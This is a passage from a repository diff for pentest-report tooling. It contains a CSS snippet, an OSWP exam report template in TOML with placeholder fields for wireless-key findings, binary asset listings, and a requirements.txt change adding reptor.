#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSWP Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Additional Items Not Mentioned in the Report"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof"
origin = "custom"
default = "TODO Provide the contents of the \"Access Point X\" wireless network key."
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in obtaining the \"Access Point X\" wireless network key. **The steps taken should be able to be easily followed and reproducible if necessary.**"
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide at least one screenshot of the successfully cracked \"Access Point X\" wireless network key and a screenshot of proof.txt."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSWP Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "Access Point X"
cvss = "n/a"
description = "TODO: A brief description of the attack chain with machine names, including the depth of compromise should be included here."
id = "30fa6ea9-64f0-4b95-a7ff-dcc2e1983d3f"
proof = "TODO Provide the contents of the \"Access Point X\" wireless network key."
steps = "TODO Provide a detailed account of your methodology in obtaining the \"Access Point X\" wireless network key. **The steps taken should be able to be easily followed and reproducible if necessary.**"
screenshots = "TODO Provide at least one screenshot of the successfully cracked \"Access Point X\" wireless network key and a screenshot of proof.txt."
[[assets]]
id = "1b6169aa-b720-4de0-b6ec-3dee7b52ec18"
name = "LICENSE"

BIN
docs/docs/assets/demo-designs.tar.gz
View File

Binary file not shown.

BIN
docs/docs/assets/demo-projects.tar.gz
View File

Binary file not shown.

BIN
docs/docs/assets/demo-templates.tar.gz
View File

Binary file not shown.

BIN
docs/docs/assets/htb-designs.tar.gz
View File

Binary file not shown.

BIN
docs/docs/assets/offsec-designs.tar.gz
View File

Binary file not shown.

3
docs/requirements.txt
View File

@ -7,4 +7,5 @@ mkdocs-redirects==1.2.1
pymdown-extensions==10.1
requests==2.31.0
pillow==10.1.0
cairosvg==2.7.1
cairosvg==2.7.1
reptor==0.8